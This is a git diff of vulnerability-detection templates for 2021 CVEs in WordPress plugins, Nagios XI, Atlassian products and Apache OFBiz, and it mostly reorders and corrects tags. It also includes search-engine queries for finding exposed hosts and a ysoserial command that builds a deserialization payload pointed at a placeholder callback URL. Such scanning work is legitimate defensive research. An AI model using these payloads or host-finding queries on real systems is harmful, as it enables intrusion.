a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -28,7 +28,7 @@ info: vendor: getperfectsurvey product: perfect_survey framework: wordpress - tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey + tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey http: - method: GET diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index 472e6b75da..ec5dcd6f18 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress + tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress http: - raw: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index b8a306abf7..9a0d444832 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -29,7 +29,7 @@ info: vendor: asgaros product: asgaros_forum framework: wordpress - tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli,asgaros + tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros http: - raw: diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 55b6cce7b8..cb96315365 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -27,7 +27,7 @@ info: vendor: bologer product: anycomment framework: wordpress - tags: redirect,anycomment,wpscan,cve,cve2021,wordpress,wp-plugin,bologer + tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer http: - method: GET diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index d02993a605..4560bc2af0 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -28,7 +28,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: wpscan,cve,wp-plugin,cve2021,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss + tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss http: - raw: diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index d92154b4ed..6d97b59c8f 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -26,7 +26,7 @@ info: vendor: implecode product: ecommerce_product_catalog framework: wordpress - tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin,implecode + tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode http: - raw: diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 750476f0e2..fa194f7d72 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -27,7 +27,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss + tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index ede5481dd6..9999a987b7 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -28,7 +28,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve2021,wordpress,wp-plugin,xss,wp,wpscan,cve,transposh + tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh http: - method: GET diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index 50dcb080d8..f4a3222f3e 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -26,7 +26,7 @@ info: product: contest_gallery framework: wordpress public-query: "/wp-content/plugins/contest-gallery/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery + tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: - raw: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index be004810f3..6d27663fd2 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -26,7 +26,7 @@ info: vendor: wpserveur product: wps_hide_login framework: wordpress - tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve,wpserveur + tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur http: - raw: diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index ed51f3e907..3b14c9feec 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -23,7 +23,7 @@ info: vendor: domaincheckplugin product: domain_check framework: wordpress - tags: wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin http: - raw: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 3b570b3b9c..61e7610a0a 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -28,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: wp-plugin,cve,wp,packetstorm,unauth,wpscan,cve2021,sqli,wordpress,secure-copy-content-protection,ays-pro + tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro http: - raw: diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 66f7cb7651..c2911e61a8 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -26,7 +26,7 @@ info: vendor: woocommerce product: persian-woocommerce framework: wordpress - tags: wp,xss,authenticated,wpscan,cve,cve2021,wordpress,wp-plugin,woocommerce + tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce http: - raw: diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index c87a67a065..cddbda08b9 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -29,7 +29,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: cve2021,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,cve,modern-events-calendar-lite,wordpress,webnus + tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus http: - raw: diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index eaf1e02866..b96add2bb8 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -25,7 +25,7 @@ info: vendor: thinkupthemes product: responsive_vector_maps framework: wordpress - tags: cve,authenticated,wpscan,cve2021,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes http: - raw: diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index d85c27eb15..eeaed6e70d 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -27,7 +27,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated,plugins360 + tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360 http: - raw: diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index b9923a1907..ceeb0d3ef2 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -26,7 +26,7 @@ info: product: paid_memberships_pro framework: wordpress publicwww-query: /wp-content/plugins/paid-memberships-pro/ - tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios + tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios http: - raw: diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 1e9e388a54..a7a2c6f8bf 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -25,7 +25,7 @@ info: vendor: heateor product: super_socializer framework: wordpress - tags: cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress,heateor + tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor http: - method: GET diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index d4e1a1739e..c97c26e38c 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -27,7 +27,7 @@ info: vendor: wp-guppy product: wp_guppy framework: wordpress - tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan,wp-guppy + tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy http: - method: GET diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 015d98bbed..670af6d744 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -28,7 +28,7 @@ info: vendor: wptaskforce product: wpcargo_track_\&_trace framework: wordpress - tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce + tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 67b1c02405..4c6aa157b9 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -25,7 +25,7 @@ info: vendor: codesnippets product: code_snippets framework: wordpress - tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,codesnippets + tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets http: - raw: diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index fe48345da6..f998e22065 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -26,7 +26,7 @@ info: product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty,premio + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: - raw: diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index f412aef5b4..baa6296841 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -23,7 +23,7 @@ info: vendor: tri product: event_tickets framework: wordpress - tags: wordpress,redirect,wp-plugin,eventtickets,wpscan,cve,cve2021,tri + tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri http: - method: GET diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index f497ba8925..c03419f30f 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -26,7 +26,7 @@ info: vendor: noptin product: noptin framework: wordpress - tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin + tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin http: - method: GET diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index be187b10fd..7d433b3c09 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -26,7 +26,7 @@ info: vendor: wow-company product: button_generator framework: wordpress - tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress,wow-company + tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company http: - raw: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 5280b99151..9474aeac94 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -27,7 +27,7 @@ info: vendor: feedwordpress_project product: feedwordpress framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project + tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project http: - raw: diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index a7d80c35e4..efc96f004d 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -25,7 +25,7 @@ info: vendor: cf7skins product: contact_form_7_skins framework: wordpress - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins http: - raw: diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 023ba7922c..3a7351fe4c 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -27,7 +27,7 @@ info: product: smash_balloon_social_post_feed framework: wordpress publicwww-query: "/wp-content/plugins/custom-facebook-feed/" - tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: - raw: diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 19e1293e65..3ae351cec8 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -27,7 +27,7 @@ info: vendor: pluginops product: landing_page framework: wordpress - tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add,pluginops + tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops http: - raw: diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 0e466e3ab9..984d76c8e7 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -25,7 +25,7 @@ info: vendor: webp_converter_for_media_project product: webp_converter_for_media framework: wordpress - tags: redirect,wp-plugin,webpconverter,wpscan,cve,cve2021,wordpress,webp_converter_for_media_project + tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index b50fb608af..b1b5e9b58b 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -26,7 +26,7 @@ info: vendor: wpdevart product: duplicate_page_or_post framework: wordpress - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpdevart + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart http: - raw: diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index d53c182a5f..022e2941e1 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -27,7 +27,7 @@ info: vendor: wpaffiliatemanager product: affiliates_manager framework: wordpress - tags: cve,wp,wordpress,authenticated,cve2021,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager + tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager http: - raw: diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index d676dbeb15..4abf5c318d 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -27,7 +27,7 @@ info: product: contact_form_entries framework: wordpress google-query: inurl:"/wp-content/plugins/contact-form-entries/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks + tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks http: - raw: diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 4fce062510..d933edc515 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -28,7 +28,7 @@ info: vendor: pluginus product: woocommerce_products_filter framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan,pluginus + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus http: - method: GET diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index f071bcdf28..7d86592fbe 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -29,7 +29,7 @@ info: vendor: givewp product: givewp framework: wordpress - tags: xss,cve2021,wp,give,wordpress,cve,wp-plugin,unauth,wpscan,givewp + tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp http: - raw: diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index c49f1fc24c..6b5b284bb8 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -25,7 +25,7 @@ info: vendor: english_wordpress_admin_project product: english_wordpress_admin framework: wordpress - tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve,english_wordpress_admin_project + tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 7e767f2fee..29c94fa7e2 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -27,7 +27,7 @@ info: vendor: i-plugins product: whmcs_bridge framework: wordpress - tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins + tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins http: - raw: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index b6d64bd09f..03b2bcc90e 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -30,7 +30,7 @@ info: product: paid_memberships_pro framework: wordpress google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: wp-plugin,wp,sqli,paid-memberships-pro,wpscan,cve,cve2021,wordpress,strangerstudios + tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: - raw: diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 6a33cecbfe..a1bb231d31 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -25,7 +25,7 @@ info: vendor: yoast product: yoast_seo framework: wordpress - tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp,yoast + tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast http: - method: GET diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 7fc1d078f1..244710256d 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -24,7 +24,7 @@ info: vendor: easysocialfeed product: easy_social_feed framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed + tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed http: - raw: diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 516f9f8f88..b2f13513ba 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -30,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev,nagios + tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 593bdd9622..c7c6115e84 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -30,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev,nagios + tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 8596db30f3..f9060e5105 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -30,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev,nagios + tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios http: - raw: diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 9946a9cc95..3e1a4c40d3 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -28,7 +28,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: cve,cve2021,nagios,nagiosxi,xss,authenticated + tags: cve2021,cve,nagios,nagiosxi,xss,authenticated http: - raw: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 7efb979fd6..3e4a302b53 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve,cve2021,apache,rce,druid + tags: cve2021,cve,apache,rce,druid http: - raw: diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index f6cbdaedea..9869a566bd 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -26,7 +26,7 @@ info: product: huemagic framework: node.js shodan-query: title:"NODE-RED" - tags: cve,cve2021,huemagic,lfi,dgtl,node.js + tags: cve2021,cve,huemagic,lfi,dgtl,node.js http: - method: GET diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 8621f055ef..399434ae91 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -27,7 +27,7 @@ info: vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" - tags: cve,cve2021,sqli,void,aurall + tags: cve2021,cve,sqli,void,aurall http: - raw: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index f243a01b34..8ab5c8d840 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -27,7 +27,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,rce,confluence,injection,ognl,kev,atlassian + tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian http: - raw: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index cfd93f3dd6..eb59a4456d 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -27,7 +27,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive + tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive http: - method: GET diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 705903edb3..6d06db4e69 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -26,7 +26,7 @@ info: vendor: atlassian product: jira_data_center shodan-query: http.component:"Atlassian Jira" - tags: lfi,packetstorm,cve,cve2021,jira,intrusive,atlassian + tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian http: - method: GET diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml index cfc55c310e..24ac9be1d2 100644 --- a/http/cves/2021/CVE-2021-26292.yaml +++ b/http/cves/2021/CVE-2021-26292.yaml @@ -17,7 +17,7 @@ info: vendor: AfterLogic product: AfterLogic Aurora & WebMail fofa-query: "X-Server: AfterlogicDAVServer" - tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic + tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic http: - raw: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 2367e49098..1fb523f6e3 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -23,7 +23,7 @@ info: vendor: afterlogic product: aurora fofa-query: "X-Server: AfterlogicDAVServer" - tags: cve,cve2021,afterlogic,exposure,AfterLogic + tags: cve2021,cve,afterlogic,exposure,AfterLogic http: - raw: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 06942a1a19..38ab72fad8 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -32,7 +32,7 @@ info: product: ofbiz shodan-query: "OFBiz.Visitor=" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce + tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce http: - raw: diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index d7e81303b4..099e1004dc 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: eprints product: eprints - tags: cve,cve2021,xss,eprints,intrusive + tags: cve2021,cve,xss,eprints,intrusive http: - method: GET diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 5840f63c30..55243ce589 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -27,7 +27,7 @@ info: vendor: impresscms product: impresscms shodan-query: http.html:"ImpressCMS" - tags: hackerone,cve,cve2021,impresscms,unauth,cms + tags: cve,cve2021,hackerone,impresscms,unauth,cms http: - raw: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 6180173599..e7e25236b5 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: eprints product: eprints - tags: cve,cve2021,xss,eprints + tags: cve2021,cve,xss,eprints http: - method: GET diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index ae9983170b..bd4fc924c7 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: redwood product: report2web - tags: cve,cve2021,redwood,xss + tags: cve2021,cve,redwood,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 725f1c53d8..f95e8ff734 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jenzabar product: jenzabar - tags: packetstorm,cve,cve2021,jenzabar,xss + tags: cve2021,cve,packetstorm,jenzabar,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-26812.yaml 